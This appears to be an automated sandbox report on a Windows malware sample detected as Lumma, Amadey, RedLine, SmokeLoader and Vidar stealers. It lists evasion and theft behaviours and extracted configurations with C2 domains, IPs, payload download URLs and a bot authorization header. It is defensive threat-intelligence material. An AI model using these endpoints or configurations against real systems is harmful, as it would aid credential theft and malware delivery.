Windows Analysis Report
1CMweaqlKp.exe

Overview

General Information

Sample name: 1CMweaqlKp.exe (renamed because the original name is a hash value)
Original sample name: 8a19d654cb37e4e51be045acaf097e74.exe
Analysis ID: 1436254
MD5: 8a19d654cb37e4e51be045acaf097e74
SHA1: 7a3a86421a806d2ba66ae84e86305847c8b1f766
SHA256: 59b3af1a244a082219116ed9b496de99236b01ae42df75bf4211ed2b7069bc4b
Tags: 32, exe, trojan

Detection

LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Mars stealer
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Yara detected SmokeLoader
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone purchase ($100/$150 depending on the version) or on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, including details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

Source: 1CMweaqlKp.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: 185.215.113.67:26260 Avira URL Cloud: Label: malware
Source: http://147.45.47.102:57893/hera/amadka.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\1000021002\ac861238af.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Avira: detection malicious, Label: TR/Redcap.pernp
Source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}
Source: 39.2.NewB.exe.e50000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "185.172.128.19/ghsdh39s/index.php", "Version": "4.12"}
Source: 40.0.jok.exe.7c0000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.67:26260"], "Bot Id": "Test1234", "Authorization Header": "bed37b7c341f364ee692c5adfa824881"}
Source: 29.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["pillowbrocccolipe.shop", "communicationgenerwo.shop", "diskretainvigorousiw.shop", "affordcharmcropwo.shop", "dismissalcylinderhostw.shop", "enthusiasimtitleow.shop", "worryfillvolcawoi.shop", "cleartotalfisherwo.shop", "affordcharmcropwo.shop"], "Build id": "LGNDR1--ketamine"}
Source: 185.215.113.67:26260 Virustotal: Detection: 16%
Source: pillowbrocccolipe.shop Virustotal: Detection: 18%
Source: cleartotalfisherwo.shop Virustotal: Detection: 18%
Source: http://185.172.128.150/c698e1bc8a2f5e6d.php Virustotal: Detection: 19%
Source: https://affordcharmcropwo.shop/d Virustotal: Detection: 9%
Source: worryfillvolcawoi.shop Virustotal: Detection: 18%
Source: https://affordcharmcropwo.shop/z Virustotal: Detection: 13%
Source: http://193.233.132.56/cost/lenin.exe1 Virustotal: Detection: 21%
Source: diskretainvigorousiw.shop Virustotal: Detection: 18%
Source: communicationgenerwo.shop Virustotal: Detection: 17%
Source: http://147.45.47.102:57893/hera/amadka.exe Virustotal: Detection: 19%
Source: https://junglethomas.com/ Virustotal: Detection: 11%
Source: http://193.233.132.56/cost/go.exe Virustotal: Detection: 25%
Source: affordcharmcropwo.shop Virustotal: Detection: 17%
Source: http://193.233.132.56/cost/go.exemadka.ex Virustotal: Detection: 21%
Source: enthusiasimtitleow.shop Virustotal: Detection: 17%
Source: https://affordcharmcropwo.shop/api Virustotal: Detection: 21%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 52%
Source: C:\Users\user\1000021002\ac861238af.exe Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe Virustotal: Detection: 43%
Source: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe Virustotal: Detection: 72%
Source: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe Virustotal: Detection: 43%
Source: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe Virustotal: Detection: 72%
Source: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe Virustotal: Detection: 43%
Source: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe Virustotal: Detection: 72%
Source: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe Virustotal: Detection: 43%
Source: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe Virustotal: Detection: 43%
Source: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe Virustotal: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Virustotal: Detection: 84%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Virustotal: Detection: 57%
Source: 1CMweaqlKp.exe ReversingLabs: Detection: 50%
Source: 1CMweaqlKp.exe Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe Joe Sandbox ML: detected
Source: C:\Users\user\1000021002\ac861238af.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\file300un[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\GIz2DLitsyoTn14REJti2nqN.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe Joe Sandbox ML: detected
Source: 1CMweaqlKp.exe Joe Sandbox ML: detected
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrcatA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: OpenEventA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateEventA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CloseHandle
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Sleep
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrlenA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ExitProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: user32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateDCA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sscanf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HAL9TH
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: JohnDoe
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DISPLAY
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: http://52.143.157.84
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /c73eed764cc59dcb.php
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /84bad7132df89fd7/
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: pisun
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalLock
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HeapFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetFileSize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalSize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Process32Next
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Process32First
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: LocalFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FindClose
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ReadFile
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: WriteFile
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CopyFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLastError
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: OpenProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ole32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wininet.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: shell32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: psapi.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SelectObject
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BitBlt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DeleteObject
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CoInitialize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetDC
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CloseWindow
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wsprintfA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CharToOemW
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wsprintfW
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: StrStrA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmStartSession
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmGetList
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmEndSession
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: encrypted_key
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PATH
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: NSS_Init
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
